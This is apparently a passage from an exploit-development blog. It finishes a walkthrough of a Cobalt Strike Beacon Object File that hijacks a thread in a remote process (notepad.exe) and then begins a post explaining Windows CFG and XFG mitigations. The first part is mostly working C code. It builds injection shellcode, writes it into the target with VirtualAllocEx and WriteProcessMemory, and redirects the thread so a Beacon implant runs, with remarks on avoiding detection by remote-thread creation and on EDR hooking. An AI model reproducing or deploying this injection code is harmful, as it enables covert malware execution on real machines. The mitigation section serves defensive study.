As you can recall in the former portion of this blog post, we first preserved the CONTEXT record for our hijacked thread, within our BOF code. The issue we have, however, is that this CONTEXT record is sitting within the current process, while our shellcode will be executed within the desired remote process. Because of the fact each user mode process has its own private address space, this CONTEXT record’s address is not visible to the remote process we are injecting into. Additionally, since NtContinue does not accept a HANDLE parameter, it expects the thread it will resume execution for is the current calling thread, which will be in the remote process. This means we will need to embed the CONTEXT record into our final payload that will be injected into the remote process. Additionally, since NtContinue restores execution of the calling thread, this is why we need to embed an NtContinue shellcode into the final payload that will be placed into the remote process. That way, when the hijacked thread executes the NtContinue routine, restoration of the hijacked thread will occur, since it is the calling thread. With that said, let’s get into developing the routine.

As with our CreateThread routine, let’s create a 64-byte buffer and a new counter.

BYTE ntContinue[64] = { 0 };
int i = 0;

As mentioned earlier, this NtContinue routine is going to be the piece of code that actually invokes the CreateThread routine. When this NtContinue routine performs the call to the CreateThread routine, it will push a return address on the stack, which will be the next instruction within this NtContinue shellcode. When the CreateThread shellcode performs its return, execution will pick back up inside of the NtContinue shellcode. With this in mind, let’s start by using a near call, which uses relative addressing, to call the CreateThread shellcode.

The first goal is to start off the NtContinue routine with a call to the CreateThread routine. To do this, we first need to calculate the distance from this call instruction to the location of the CreateThread shellcode. In order to properly do this, we need to take one thing into consideration: we also need to carry the preserved CONTEXT record with us, for use in the NtContinue call, so it will sit between the two routines. To make the call, we will use a near call. Near calls, in assembly, do not call an absolute address, like the address of a Windows API function, for instance. Instead, near call instructions call a function relative to the address in the instruction pointer. Essentially, if we can calculate the distance, as a DWORD, to the CreateThread routine, we can just emit the opcode 0xe8, followed by a DWORD representing the distance from the current memory location, in order to dynamically call the CreateThread routine! The reason we are using a DWORD, which is a 32-bit value, is that in 64-bit mode the 0xe8 near call takes a 32-bit relative displacement, referred to in this post as a relative virtual address (RVA). The 16-bit form is only available outside of 64-bit mode. This 32-bit value is sign extended to a 64-bit value before it is added to RIP. More information on the different calling mechanisms on x86_64 systems can be found here. The offset to our shellcode will be the size of our NtContinue routine plus the size of a CONTEXT record. This essentially will “jump over” the NtContinue code and the CONTEXT record, in order to first execute the CreateThread routine. The corresponding instructions we need are as follows.

// First calculate the size of a CONTEXT record and NtContinue routine
// Then, "jump over shellcode" by calling the buffer at an offset of the calculation (64 bytes + CONTEXT size)

// 0xe8 is a near call, which uses RIP as the base address for RVA calculations and dynamically adds the offset specified by shellcodeOffset
ntContinue[i++] = 0xe8;

// Subtracting to compensate for the near call opcode (represented by i) and the DWORD used for relative addressing
DWORD shellcodeOffset = sizeof(ntContinue) + sizeof(CONTEXT) - sizeof(DWORD) - i;
mycopy(ntContinue + i, &shellcodeOffset, sizeof(shellcodeOffset));

// Update counter with location buffer can be written to
i += sizeof(shellcodeOffset);

Although the above code practically represents what was said above, you can see that the size of a DWORD and the value of i are subtracted from the offset previously mentioned. This is because the whole NtContinue routine is 64 bytes. By the time the code has finished executing the entire call instruction, a few things will have happened. The first being, the call opcode itself, 0xe8, will have been executed. This takes us from being at the beginning of our routine, byte 1/64, to the second byte in our routine, byte 2/64. The CreateThread routine, which we need to call, is now one byte closer than when we started - and this will affect our calculations. In the above set of instructions, this byte has been compensated for by subtracting the already executed opcode (the current value of i). Additionally, four bytes are taken up by the actual offset itself, a DWORD, which is a 4 byte value. This means execution will now be at byte 5/64 (one byte for the opcode and four bytes for the DWORD). To compensate for this, the size of a DWORD has been subtracted from the total offset. If you think about it, this makes sense. By the time the call has finished executing, the CreateThread routine will be five bytes closer. If we used the original offset, we would have overshot the CreateThread routine by five bytes. Additionally, we update the i counter variable to let it know how many bytes we have written to the overall NtContinue routine. We will walk through all of these instructions inside of the debugger, once we have finished developing this small shellcode routine.

At this point, the NtContinue routine would have called the CreateThread routine. The CreateThread routine would have returned execution back to the NtContinue routine, and the next instructions in the NtContinue routine would execute.

The next few instructions are a bit of a “hacky” method to pass the first parameter, a pointer to our CONTEXT record, to the NtContinue function. We will use a call/pop routine, which is a well-documented method and can be read about here and here. As we know, we are required to place the first value, for our purposes, into the RCX register - per the __fastcall calling convention. This means we need to calculate the address of the CONTEXT record somehow. To do this, we actually use another near call instruction in order to call the immediate byte after the call instruction.

// Near call with a displacement of 0, which calls the address directly after the call instruction
// The call pushes its return address (the address of the next instruction) onto the stack, where the upcoming pop can retrieve it for use as the base of the RVA calculation
ntContinue[i++] = 0xe8;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;

The instruction this call will execute is the immediate next instruction to be executed, which will be a pop rcx instruction added by us. Additionally the value of i at this point is saved into a new variable called contextOffset.

// The previous call instruction pushes a return address onto the stack
// The return address will be the address, in memory, of the upcoming pop rcx instruction
// Since current execution is no longer at the beginning of the ntContinue routine, the distance to the CONTEXT record is no longer 64-bytes
// The address of the pop rcx instruction will be used as the base for RVA calculations to determine the distance between the value in RCX (which will be the address of the 'pop rcx' instruction) to the CONTEXT record
// Obtaining the current amount of bytes executed thus far
int contextOffset = i;

// __fastcall calling convention
// NtContinue requires a pointer to a context record and an alert state (FALSE in this case)
// pop rcx (get return address, which isn't needed for anything, into RCX for RVA calculations)
ntContinue[i++] = 0x59;

The purpose of this is that the call instruction will push the address of the pop rcx instruction onto the stack. This is the return address of the call. Since the next instruction directly after the call is pop rcx, it will place the value at RSP, which is now the address of the pop rcx instruction due to call POP_RCX_INSTRUCTION pushing it onto the stack, into the RCX register. This helps us, as now we have a memory address that is relatively close to the CONTEXT record, which will be located directly after the 64-byte NtContinue routine.

Now, as we know, the original offset of the CONTEXT record from the very beginning of the entire NtContinue routine was 64 bytes. This is because we will copy the CONTEXT record directly after the 64-byte BYTE array, ntContinue, in our final buffer. Right now, however, if we add 64 bytes to the value in RCX, we will overshoot the CONTEXT record’s address. This is because we have executed quite a few instructions of the 64-byte shellcode, meaning we are now closer to the CONTEXT record than we were when we started. To compensate for this, we can add the original 64-byte offset to the RCX register, and then subtract the contextOffset value, which represents the total amount of opcode bytes executed up until that point. This will give us the correct distance from our current location to the CONTEXT record.

// The address of the pop rcx instruction is now in RCX
// Adding the distance between the CONTEXT record and the current address in RCX
// add rcx, distance to CONTEXT record
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xc1;

// Value to be added to RCX
// The distance between the value in RCX (address of the 'pop rcx' instruction) and the CONTEXT record can be found by subtracting the amount of bytes executed up until the 'pop rcx' instruction from the original 64-byte offset
ntContinue[i++] = sizeof(ntContinue) - contextOffset;

This will place the address of the CONTEXT record into the RCX register. If this doesn’t compute, don’t worry. In a brief moment, we will step through everything inside of WinDbg to visually put things together.

The next goal is to set the RaiseAlert function argument to FALSE, which is a value of 0. To do this, again, we will use bitwise XOR.

// xor rdx, rdx
// Set to FALSE
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x31;
ntContinue[i++] = 0xd2;

All that is left now is to call NtContinue! Again, just like our call to CreateThread, we can resolve the address of the API inside of the current process and pass the return value to the remote process, as even though each process is mapped its own Windows DLLs, the addresses are the same across the system.

The opcode bytes for the mov rax instruction come first.

// Place NtContinue into RAX
ntContinue[i++] = 0x48;
ntContinue[i++] = 0xb8;

We then resolve the address of NtContinue, Beacon Object File style.

// Although the thread is in a remote process, the Windows DLLs mapped to the Beacon process, although private, will correlate to the same virtual address
// GetProcAddress returns a FARPROC, so cast it explicitly to a 64-bit integer
unsigned long long ntcontinueAddress = (unsigned long long)KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("ntdll"), "NtContinue");

// Error handling. If NtContinue cannot be resolved, abort
if (ntcontinueAddress == 0)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve NtContinue. Error: 0x%lx\n", KERNEL32$GetLastError());
}

Using the custom mycopy function, we then can copy the address of NtContinue at the correct index within the BYTE array, based on the value of i.

// Copy the address of NtContinue function address to the NtContinue routine buffer
mycopy(ntContinue + i, &ntcontinueAddress, sizeof(ntcontinueAddress));

// Update the counter with the correct offset the next bytes should be written to
i += sizeof(ntcontinueAddress);

At this point, things are as easy as just allocating some stack space for good measure and calling the value in RAX, NtContinue!

// Allocate some space on the stack for the call to NtContinue
// sub rsp, 0x20
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xec;
ntContinue[i++] = 0x20;

// call NtContinue
ntContinue[i++] = 0xff;
ntContinue[i++] = 0xd0;

All there is left now is the stack alignment routine inside of the call to CreateThread! This alignment is to ensure the stack pointer is 16-byte aligned when the call from the NtContinue routine invokes the CreateThread routine.

Will The Stars Align?

The following routine will perform bitwise AND with the stack pointer, to ensure a 16-byte aligned RSP value inside of the CreateThread routine, by clearing out the last 4 bits of the address.

// Create 4 byte buffer to perform bitwise AND with RSP to ensure 16-byte aligned stack for the call to shellcode
// and rsp, 0FFFFFFFFFFFFFFF0
stackAlignment[0] = 0x48;
stackAlignment[1] = 0x83;
stackAlignment[2] = 0xe4;
stackAlignment[3] = 0xf0;

After the stack alignment is completed, all there is left to do is invoke malloc to create a large buffer that will contain all of our custom routines, inject the final buffer, and call SetThreadContext and ResumeThread to queue execution!

// Allocating memory for final buffer
// Size of NtContinue routine, CONTEXT structure, stack alignment routine, and CreateThread routine
PVOID shellcodeFinal = (PVOID)MSVCRT$malloc(sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread));

// Copy NtContinue routine to final buffer
mycopy(shellcodeFinal, ntContinue, sizeof(ntContinue));

// Copying CONTEXT structure, stack alignment routine, and CreateThread routine to the final buffer
// Allocation is already a pointer (PVOID) - casting to a DWORD64 type, a 64-bit address, in order to write to the buffer at a desired offset
// Using RtlMoveMemory for the CONTEXT structure to avoid casting to something other than a CONTEXT structure
NTDLL$RtlMoveMemory((DWORD64)shellcodeFinal + sizeof(ntContinue), &cpuRegisters, sizeof(CONTEXT));
mycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT), stackAlignment, sizeof(stackAlignment));
mycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment), createThread, sizeof(createThread));

// Declare a variable to represent the final length
int finalLength = (int)sizeof(ntContinue) + (int)sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread);

Before moving on, notice the call to RtlMoveMemory when it comes to copying the CONTEXT record to the buffer. This is due to mycopy being prototyped to access the source and destination buffers as char* data types. However, RtlMoveMemory is prototyped to accept pointers of type VOID UNALIGNED, which indicates pretty much any data type can be used. This is perfect for us, as CONTEXT is a structure, not a char*.

The above code creates a buffer large enough to hold all of our routines and copies each piece into the buffer at the correct offset, with the NtContinue routine being copied first, followed by the preserved CONTEXT record of the hijacked thread, the stack alignment routine, and the CreateThread routine. After this, the shellcode is injected into the remote process.

First, VirtualAllocEx is called again.

// Allocate memory in the target process with read/write/execute permissions
PVOID allocateMemory = KERNEL32$VirtualAllocEx(
  processHandle,
  NULL,
  finalLength,
  MEM_RESERVE | MEM_COMMIT,
  PAGE_EXECUTE_READWRITE
);

if (allocateMemory == NULL)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to allocate memory in the remote process. Error: 0x%lx\n", KERNEL32$GetLastError());
}

Secondly, WriteProcessMemory is called to write the shellcode to the allocation.

// Write shellcode to the new allocation
BOOL writeMemory = KERNEL32$WriteProcessMemory(
  processHandle,
  allocateMemory,
  shellcodeFinal,
  finalLength,
  NULL
);

if (!writeMemory)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to write memory to the buffer. Error: 0x%lx\n", KERNEL32$GetLastError());
}

After that, RSP and RIP are set before the call to SetThreadContext. RIP will point to our final buffer and, once the thread is resumed, the code RIP points to will be executed.

// Allocate stack space by subtracting the stack by 0x2000 bytes
cpuRegisters.Rsp -= 0x2000;

// Change RIP to point to our shellcode and typecast buffer to a DWORD64 because that is what a CONTEXT structure uses
cpuRegisters.Rip = (DWORD64)allocateMemory;

Notice that RSP is subtracted by 0x2000 bytes. @zerosum0x0’s blog post on ThreadContinue adopts this feature, to allow breathing room on the stack in order for code to execute, and I decided to adopt it as well in order to avoid heavy troubleshooting.

After that, all there is left to do is to invoke SetThreadContext, ResumeThread, and free!

SetThreadContext

// Set RIP
BOOL setRip = KERNEL32$SetThreadContext(
  desiredThread,
  &cpuRegisters
);

// Error handling
if (!setRip)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to set the target thread's RIP register. Error: 0x%lx\n", KERNEL32$GetLastError());
}

ResumeThread

// Call to ResumeThread()
DWORD resume = KERNEL32$ResumeThread(
  desiredThread
);

free

// Free the buffer used for the whole payload
MSVCRT$free(
  shellcodeFinal
);

Additionally, you should always clean up handles in your code - but especially in Beacon Object Files, as they are “sensitive”.

// Close handle
KERNEL32$CloseHandle(
  desiredThread
);
// Close handle
KERNEL32$CloseHandle(
  processHandle
);

Debugger Time

Let’s use an instance of notepad.exe as our target process and attach to it in WinDbg.

The PID we want to inject into is 7548 for our purposes. After loading our Aggressor Script developed earlier, we can use the command cThreadHijack 7548 TESTING, where TESTING is the name of the HTTP listener Beacon will interact with.

There we go, our BOF successfully ran. Now, let’s examine what we are working with in WinDbg. As we can see, the address of our final buffer is shown in the Current RIP: 0x1f027f20000 output line. Let’s view this in WinDbg.

Great! Everything seems to be in place. As is shown in the mov rax,offset ntdll!NtContinue instruction, we can see our NtContinue routine. The beginning of the NtContinue routine should call the address of the stack alignment and CreateThread shellcode, as mentioned earlier in this blog post. Let’s see what the address 0x000001f027f20510 references, which is the memory address being called.

Perfect! As we can see by the and rsp, 0FFFFFFFFFFFFFFF0 instruction, along with the address of KERNEL32!CreateThreadStub, the NtContinue routine will first call the stack alignment and CreateThread routines. In this case, we are good to go! Let’s now start walking through execution of the code.

Upon SetThreadContext being invoked, which changes the RIP register to execute our shellcode, we can see that execution has reached the first call, which will invoke the stack alignment and CreateThread routines. Stepping through this call, as we know, will push a return address onto the stack. As mentioned previously, this will be the address of that next call 0x000001f027f2000a instruction. When the CreateThread routine returns, it will return to this address. After stepping through the instruction, we can see that the address of the next call is pushed onto the stack.

Execution then reaches the bitwise AND instruction. As we can see from the above image, and rsp, 0FFFFFFFFFFFFFFF0 is redundant, as the stack pointer is already 16-byte aligned (the last 4 bits are already set to 0). Stepping through the bitwise XOR operations, RCX and RDX are set to 0.

As we know from the CreateThread prototype, the lpStartAddress parameter is a pointer to our shellcode. Looking at the above image, we can see the third argument, which will be loaded into R8, is 0x1f027ee0000. Unassembling this address in the debugger discloses this is our Beacon implant, which was injected earlier! To verify this, you can generate a raw Beacon stageless artifact in Cobalt Strike manually and run it through hexdump to confirm the first few opcodes correspond.

After stepping through the instruction, the value is loaded into the R8 register. The next instruction sets R9 to 0 via xor r9, r9.

Additionally, [RSP + 0x20] and [RSP + 0x28] are set to 0, by copying the value of R9, which is now 0, to these locations. Here is what [RSP + 0x20] and [RSP + 0x28] look like before the mov [rsp + 0x20], r9 and mov [rsp + 0x28], r9 instructions and after.

After that, CreateThread is placed into RAX and is called. Note CreateThread is actually CreateThreadStub. This is because the implementations of most former kernel32.dll functions were moved into a DLL called KERNELBASE.dll. These “stub” functions essentially just redirect execution to the correct KERNELBASE.dll function.

Stepping over the function, with p in WinDbg, places the CreateThread return value, into RAX - which is a handle to the local thread containing the Beacon implant.

After execution of our NtContinue routine is complete, we will receive the Beacon callback as a result of this thread.

Additionally, we can see that RSP now points to the return address, which is the address of the first “real” instruction of our NtContinue routine. A ret instruction, which is what RIP currently points to, will pop the value at the top of the stack (the value RSP points to) into RIP. Executing the return redirects execution back to the NtContinue routine.

As we can see in the image above, the next call instruction calls the pop rcx instruction. This call instruction, when executed, will push the address of the pop rcx instruction onto the stack, as a return address.

Executing the pop rcx instruction, we can see that RCX now contains the address, in memory, of the pop rcx instruction. This will be the base address used in the RVA calculations to resolve the address of the preserved CONTEXT record.

To verify if our offset is correct, we can use .cxr in WinDbg to divulge if the contiguous memory block located at RCX + 0x36 is in fact a CONTEXT record. 0x36 is chosen, as this is the value currently that is about to be added to RCX, as seen a few screenshots ago. Verifying with WinDbg, we can see this is the case.

If this had not been the correct location of the CONTEXT record, this WinDbg command would have failed, as the memory block would not have been parsed correctly.

Now that we have verified our CONTEXT record is in the correct place, we can perform the RVA calculation to add the correct distance to the CONTEXT record, meaning the pointer is then stored in RCX, fulfilling the PCONTEXT parameter of NtContinue.

Stepping through xor rdx, rdx, which sets the RaiseAlert parameter of NtContinue to FALSE, execution lands on the call rax instruction, which will call NtContinue.

Pressing g in the debugger then shows us that quite a few DLLs are mapped into notepad.exe.

This is the Beacon implant resolving needed DLLs for various function calls - meaning our Beacon implant has been executed! If we go back into Cobalt Strike, we can see we now have a Beacon in context of notepad.exe with the same PID of 7548!

Additionally, you will notice on the victim machine that notepad.exe is fully functional! We have successfully forced a remote thread to execute our payload and restored it, all in one go.

Final Thoughts

Obviously, this technique isn’t without its flaws. There are still IOCs for this technique, including invoking SetThreadContext, amongst other things. However, this does avoid invoking any sort of action that creates a remote thread, which is still useful in most situations. This technique could be taken further, perhaps with invoking direct system calls versus invoking these APIs, which are susceptible to hooking, with most EDR products.

Additionally, one thing to note is that since this technique suspends a thread and then resumes it, you may have to wait anywhere from a few moments to a few minutes for the thread to get around to executing. Interacting with the process directly will force execution, but targeting Windows processes whose threads execute often is also a good way to avoid long waits.

I had a lot of fun implementing this technique into a BOF and I am really glad I have a reason to write more C code! Like always: peace, love, and positivity :-).

Exploit Development: Between a Rock and a (Xtended Flow) Guard Place: Examining XFG

23 August 2020 at 00:00

Introduction

Previously, I have blogged about ROP and the benefits of understanding how it works. Not only is it a viable first-stage payload for obtaining native code execution, but it can also be leveraged for things like arbitrary read/write primitives and data-only attacks. Unfortunately, if your end goal is native code execution, there is a good chance you are going to need to overwrite a function pointer in order to hijack control flow. Taking this into consideration, Microsoft implemented Control Flow Guard, or CFG, as an optional update back in Windows 8.1. Although it was released before Windows 10, it did not really catch on in terms of “mainstream” exploitation until recent years.

After a few years, and a few bypasses along the way, Microsoft decided they needed a new Control Flow Integrity (CFI) solution - hence XFG, or Xtended Flow Guard. David Weston gave an overview of XFG at his talk at BlueHat Shanghai 2019, and it is pretty much the only public information we have at this time about XFG. This “finer-grained” CFI solution will be the subject of this blog post. A few things before we start about what this post is and what it isn’t:

  1. This post is not an “XFG internals” post. I don’t know every single low level detail about it.
  2. Don’t expect any bypasses from this post - this mitigation is still very new and not very explored.
  3. We will spend a bit of time understanding what indirect function calls are via function pointers, what CFG is, and why XFG is a very, very nice mitigation (IMO).

This is simply going to be an “organized brain dump” and isn’t meant to be a “learn everything you need to know about XFG in one sitting” post. This is just simply documenting what I have learned after messing around with XFG for a while now.

The Blueprint for XFG: CFG

CFG is a pretty well documented exploit mitigation, and I have done my fair share of documenting it as well. However, for completeness sake, let’s talk about how CFG works and its potential shortcomings.

Note that before we begin, Microsoft deserves recognition for being one of the leaders in implementing a Control Flow Integrity (CFI) initiative and among the first to actually release a CFI solution.

Firstly, to enable CFG, a program is compiled and linked with the /guard:cf flag. This can be done through the Microsoft Visual Studio tool cl (which we will look at later). However, more easily, this can be done by opening Visual Studio and navigating to Project -> Properties -> C/C++ -> Code Generation and setting Control Flow Guard to Yes (/guard:cf).

CFG at this point would now be enabled for the program - or in the case of Microsoft binaries, they would already be CFG enabled (most of them). This causes a bitmap to be created, which essentially is made up of all functions within the process space that are “protected by CFG”. Then, before an indirect function call is made (we will explore what an indirect call is shortly if you are not familiar), the function being called is sent to a special CFG function. This function checks to make sure that the function being called is a part of the CFG bitmap. If it is, the call goes through. If it isn’t, the call fails.

Since this is a post about XFG, not CFG, we will skip over the technical details of CFG. However, if you are interested to see how CFG works at a lower level, Morten Schenk has an excellent post about its implementation in user mode (the Windows kernel has been compiled with CFG, known as kCFG, since Windows 10 1703. Note that Virtualization-Based Security, or VBS, is required for kCFG to be enforced. However, even when VBS is disabled, kCFG has some limited functionality. This is beyond the scope of this blog post).

Moving on, let’s examine how an indirect function call (e.g. call [rax] where RAX contains a function address or a function pointer), which initiates a control flow transfer to a different part of an application, looks without CFG or XFG. To do this, let’s take a look at a very simple program that performs a control flow transfer.

Note that you will need Microsoft Visual Studio 2019 Preview 16.5 or greater in order to follow along.

Let’s talk about what is happening here. Firstly, this code is intentionally written this way and is obviously not the most efficient way to do this. However, it is done this way to help simulate a function pointer overwrite and the benefits of XFG/CFG.

Firstly, we have a function called void cfgTest() that just prints a sentence. This function is then assigned to a function pointer called void (*cfgTest1), which actually is an array. Then, in the main() function, the function pointer void (*cfgTest1) is executed. Since void (*cfgTest1) is pointing to void cfgTest(), this will actually just cause void (*cfgTest1) to execute void cfgTest(). This will create a control flow transfer, as the main() function will perform a call to the void (*cfgTest1) function, which will then call the void cfgTest() function.

To compile with the command line tool cl, type in “x64 Native Tools Command Prompt for VS 2019 Preview” in the Start menu and run the program as an administrator.

This will drop you into a special Command Prompt. From here, you will need to navigate to the installation path of Visual Studio, and you will be able to use the cl tool for compilation.

Let’s compile our program now!

The above command essentially compiles the program with the /Zi flag and the /INCREMENTAL:NO linking option. Per Microsoft Docs, /Zi is used to create a .pdb file for symbols (which will be useful to us). /INCREMENTAL:NO has been set to instruct cl not to use the incremental linker. This is because the incremental linker is essentially used for optimization, which can create things like jump thunks. Jump thunks are essentially small functions that only perform a jump to another function. An example would be, instead of call function1, the program would actually perform a call j_function1. j_function1 would simply be a function that performs a jmp function1 instruction. This functionality will be turned off for brevity. Since our “dummy program” is so simple, it will be optimized very easily. Knowing this, we are disabling incremental linking in order to simulate a “Release” build (we are currently building “Debug” builds) of an application, where incremental linking would be disabled by default. However, none of this is really relevant here - it is just a point of clarification for the reader. Just know we are doing it for our purposes.

The result of the compilation command will place the output file, named Source.exe in this case, into the current directory along with a symbol file (.pdb). Now, we can open this application in IDA (you’ll need to run IDA as an administrator, as the application is in a privileged directory). Let’s take a look at the main() function.

Let’s examine the assembly above. The above function loads the void (*cfgTest1) function pointer into RCX. Since void (*cfgTest1) is a function pointer to an array, the value in RCX itself isn’t what is needed to jump to the array. Only when RCX is dereferenced in the call qword ptr [rcx+rax] instruction does program execution actually perform a control flow transfer to void (*cfgTest1)’s first index - which is void cfgTest(). This is why call qword ptr [rcx+rax] is being performed, as RAX is the position in the array that is being indexed.

Taking a look at the call instruction in IDA, we can see that clearly this will redirect program execution to void cfgTest().

Additionally, in WinDbg, we can see that Source!cfgTest1, which is a function pointer, points to Source!cfgTest.

Nice! We know that our program will redirect execution from main() to void (*cfgTest1) and then to void cfgTest()! Let’s say as an attacker, we had an arbitrary write primitive and we were able to overwrite what void (*cfgTest1) points to. We could actually change where the application actually ends up calling! This is not good from a defensive perspective.

Can we mitigate this issue? Let’s go back and recompile our application with CFG this time and find out.

This time, we add /guard:cf as a flag, as well as a linking option.

Disassembling the main() function in IDA again, we notice things look a bit different.

Very interesting! Instead of making a call directly to void (*cfgTest1) this time, it seems as though the function __guard_dispatch_icall_fptr will be invoked. Let’s set a breakpoint in WinDbg on main() and see how this looks after invoking the CFG dispatch function.

After setting a breakpoint on the main() function, code execution hits the CFG dispatch function.

The CFG dispatch function then performs a dereference and jumps to ntdll!LdrpDispatchUserCallTarget.

We won’t get into the technical details about what happens here, as this post isn’t built around CFG and Morten’s blog already explains what will happen. But essentially, at a high level, this function will check the CFG bitmap for the Source.exe process and determine if the void cfgTest() function is a valid target (a.k.a if it’s in the bitmap). Obviously this function hasn’t been overwritten, so we should have no problems here. After stepping through the function, control flow should transfer back to the void cfgTest() function seamlessly.

Execution has returned back to the void cfgTest() function. Additionally what is nice, is the lack of overhead that CFG put on the program itself. The check was very quick because Microsoft opted to use a bitmap instead of indexing an array or some other structure.

You can also see what functions are protected by the CFG bitmap by using the dumpbin tool within the Visual Studio installation directory and the special Visual Studio Command Prompt. You can use the command dumpbin /loadconfig APPLICATION.exe to view this.

Let’s see if we can take this even further and potentially show why XFG is definitely a better/more viable option than CFG.

CFG: Potential Shortcomings

As mentioned earlier, CFG checks functions to make sure they are part of the “CFG bitmap” (a.k.a protected by CFG). This means a few things from an adversarial perspective. If we were to use VirtualAlloc() to allocate some virtual memory, and overwrite a function pointer that is protected by CFG with the returned address of the allocation - CFG would make the program crash.

Why? VirtualAlloc() (for instance) would return a virtual address of something like 0xdb0000. When the application in question was compiled with CFG, obviously this memory address wasn’t a part of the application. Therefore, this address wouldn’t be “protected by CFG” and the program would crash. However, this is not very practical. Let’s think about what an adversary tries to accomplish with ROP.

Adversaries want to return into a Windows API function like VirtualProtect() in order to dynamically change permissions of memory. What is interesting about CFG is that in addition to the program’s functions, all exported Windows functions that make up the “module” import list for a program can be called. For instance, the application we are looking at is called Source.exe. Dumping the loaded modules for the application, we can see that KERNELBASE.dll, kernel32.dll, and ntdll.dll (which are the usual suspects) are loaded for this application.

Let’s see if/how this could be abused!

Let’s firstly update our program with a new function.

This program works exactly as the program before, except the function void protectMe2() is added in to add another user defined function to the CFG bitmap. Note that this function will never be executed, and that is poor from a programmer’s perspective. However, this function’s sole purpose is to just show another protected function. This can be verified again with dumpbin.

Here, we can see that Source!cfgTest1 still points to Source!cfgTest.

Let’s recall what was said earlier about how CFG only validates if a function resides within the CFG bitmap or not. Let’s now perform a simulated arbitrary write condition in WinDbg to overwrite what Source!cfgTest1 points to, with Source!protectMe2.

The above command uses x to show the address of the Source!protectMe2 function and then uses dps to show that Source!cfgTest1 still points to Source!cfgTest. Then, using ep, we overwrite the function pointer. dps once again verifies that the function pointer overwrite has occurred.

Let’s now step through the program to see what happens. Program execution firstly hits the CFG dispatch function.

Looking at the RAX register, which is used to hold the address of the function CFG will check, we see it has been overwritten with Source!protectMe2 instead of Source!cfgTest.

Execution then hits ntdll!LdrpDispatchUserCallTarget. After walking the function, which validates if the in scope function resides within the CFG bitmap for the process, execution redirects to Source!protectMe2!

This is very interesting from an adversarial perspective, as we were successfully able to overwrite a function pointer and CFG didn’t terminate our process! The only caveat being that the function is a part of the current process’s CFG bitmap.

What is even more interesting, is that function pointers protected by CFG can be overwritten by any exported function at runtime! Let’s rework this example, but try to call a Windows API function like KERNELBASE!WriteProcessMemory.

First, we simulate the arbitrary write by overwriting Source!cfgTest1 with KERNELBASE!WriteProcessMemory.

Program execution passes through Source!__guard_dispatch_icall_fptr and ntdll!LdrpDispatchUserCallTarget and we can clearly see execution returns to KERNELBASE!WriteProcessMemory.

This shows that even with CFG enabled, it is still possible to call functions that have overwritten other functions. This is not good, as calls can still be made with malign intent. Additionally, calling functions of different types out of context may result in a type confusion or other programmatic behavioral problems.

Now that we have armed ourselves with an understanding of why CFG is an amazing start to solving the CFI problem, but yet still contains many shortcomings, let’s get into XFG and what makes it better and different.

XFG: The Next Era of CFI for Windows

Let’s start out by talking about what XFG is at a high level. After we go through some high level details about XFG, we will compile our program with XFG and walk through the dispatch function(s), as well as perform some simulated function pointer overwrites to see how XFG reacts and additionally see how XFG differs from CFG.

My last CrowdStrike blog post touches on XFG, but not in too much detail. XFG essentially is a more “hardened” version of CFG. How so? XFG, at compile time, produces a “type-based hash” of a function that is going to be called in a control flow transfer. This hash will be placed 8 bytes above the target function, and will be compared against a preserved version of that hash when an XFG dispatch function is executed. If the hashes match, control flow transfer is then passed to the in scope function that was checked. If the hashes differ, the program crashes.
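As a rough illustration of the idea, here is a toy model in Python. The hash below is a stand-in (64 bits of SHA-256 over a prototype string) chosen purely for the sketch, not the algorithm the compiler uses, and the addresses and the names `type_hash`, `functions`, `otherFunc` and `xfg_guarded_call` are hypothetical.

```python
import hashlib

def type_hash(prototype):
    # Stand-in for the compile-time "type-based hash". This is NOT the real
    # XFG algorithm, just a deterministic 64-bit value per prototype string.
    digest = hashlib.sha256(prototype.encode()).digest()
    return int.from_bytes(digest[:8], "little")

class XfgViolation(Exception):
    """Raised when the stored hash does not match the call site's hash."""

# address -> (name, hash that would sit 8 bytes above the function)
functions = {
    0x1000: ("cfgTest", type_hash("void(void)")),
    0x1040: ("otherFunc", type_hash("int(int)")),
}

def xfg_guarded_call(target, call_site_hash):
    name, stored_hash = functions[target]
    if stored_hash != call_site_hash:
        raise XfgViolation(name)
    return name

# The call site was compiled expecting a void(void) target.
expected = type_hash("void(void)")
print(xfg_guarded_call(0x1000, expected))      # hashes match
try:
    xfg_guarded_call(0x1040, expected)         # a known function, but the wrong type
except XfgViolation as exc:
    print("XFG violation calling", exc)
```

The point of the sketch is that the call site, not just the target, now takes part in the check.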

Let’s take a look a bit more at this. Firstly, let’s compile our program with XFG!

Note that you will need Visual Studio 2019 Preview + at least Windows 10 21H1 in order to use XFG. Additionally, XFG is not found in the GUI compilation options.

Using the /guard:xfg flag in compilation and linking, we can enable XFG for our application.

Notice that even though it was not selected, CFG is still enabled for our application.

Let’s crack open IDA again to see how the main() function looks with the addition of XFG.

Very interesting! Firstly, we can see that R10 takes in the value of the XFG “type-based” hash. Then, a call is performed to the XFG dispatch call __guard_xfg_dispatch_icall_fptr. Note that the hash has been deemed “immutable” by Microsoft and cannot be modified by an attacker, due to its read only state.

In the image below, the location of the XFG hash is at 00007ff7ded4110c.

We can see that this address is executable (obviously) and readable - with the ability to write disabled.

Additionally, you can use the dumpbin tool to print out the functions protected by CFG/XFG. Functions protected by XFG are denoted with an X.

Before we move on, one interesting thing to note is that the XFG hash is already placed 8 bytes above an XFG protected function BEFORE any code execution actually occurs.

For instance, Source!cfgTest is an XFG protected function. 8 bytes above this function is the hash seen in the previous image, but with an additional bit set.

We will see why this additional bit has been set when we step through the functions that perform XFG checks.

Moving on, let’s step through this in WinDbg to see what we are working with here, and how execution flow will go.

Firstly, execution lands on the XFG dispatch function.

